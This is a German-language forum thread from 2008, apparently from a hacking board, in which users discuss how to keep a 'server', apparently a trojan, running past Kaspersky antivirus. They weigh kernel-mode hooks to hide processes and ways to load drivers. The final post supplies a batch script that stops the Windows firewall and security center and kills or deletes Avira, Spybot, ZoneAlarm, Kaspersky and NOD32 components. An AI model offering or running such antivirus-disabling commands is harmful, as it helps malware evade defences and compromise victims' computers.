Wer hat denn hier je was von .exe "killen" gesagt? Ich kann hier nichts davon lesen - obendrein würde es auch absolut keinen Sinn machen, da man von Ring-3 keinen Zugriff auf die Kaspersky-Prozesse haben wird (ZwTerminateProcess-Hook, sowie diverse auf die Speicheroperationen etc.).
Ergebnis 11 bis 16 von 16
-
23.12.2008, 12:26 #11I'm in ur VM.
- Registriert seit
- 23.07.2007
- Beiträge
- 1.038
I can haz RCE?
-
23.12.2008, 13:15 #12Stanley Jobson
- Registriert seit
- 23.08.2008
- Beiträge
- 729
Wenn du deinen Server nicht starten willst, weil ein AV läuft, ist dass sinnlos. Dann lieber über Ring0 nen Hook im System anbringen, der den Prozess versteckt.
-
23.12.2008, 13:46 #13is a Grammar Nazi
- Registriert seit
- 05.06.2007
- Beiträge
- 431
Dafür muss man natürlich noch einen Treiber installieren, was wohl ebenfalls von KAV gehookt sein wird.
Zitat von GregorSamsa
Sunshine, hurricane
All the highs & lows
-
23.12.2008, 14:52 #14I'm in ur VM.
- Registriert seit
- 23.07.2007
- Beiträge
- 1.038
Und genau das ist es auch, zudem sorgen Treiber, die nicht mit ausreichender Kenntnis in Ring-0 programmiert wurden, für etliche Bluescreens und dergleichen. Dazu kommt noch das Driver Signing unter Vista und ähnliche Techniken unter Linux und die Idee mit einem Treiber ist ganz schnell aus der Welt.
I can haz RCE?
-
23.12.2008, 15:01 #15Stanley Jobson
- Registriert seit
- 23.08.2008
- Beiträge
- 729
Darum geht es doch, die Herausforderung, einen Weg zu finden, an KAV vorbeizukommen. Treiber kann man auch durch mehr als eine Möglichkeit laden. Vllt. findet man ja einen Weg...
-
23.12.2008, 16:51 #16Moderator
- Registriert seit
- 25.06.2006
- Beiträge
- 792
das funkt glaube ich immernoch
BATCH:
Code:net stop SharedAccess net stop wscsvc net stop AntiVirService net stop AntiVirScheduler tskill TeaTimer if exist "C:\Programme\Spybot - Search & Destroy\TeaTimer.exe" del /Q "C:\Programme\Spybot - Search & Destroy\TeaTimer.exe" tskill zlclient tskill Kavsvc.exe net stop nod32krn
Zitieren
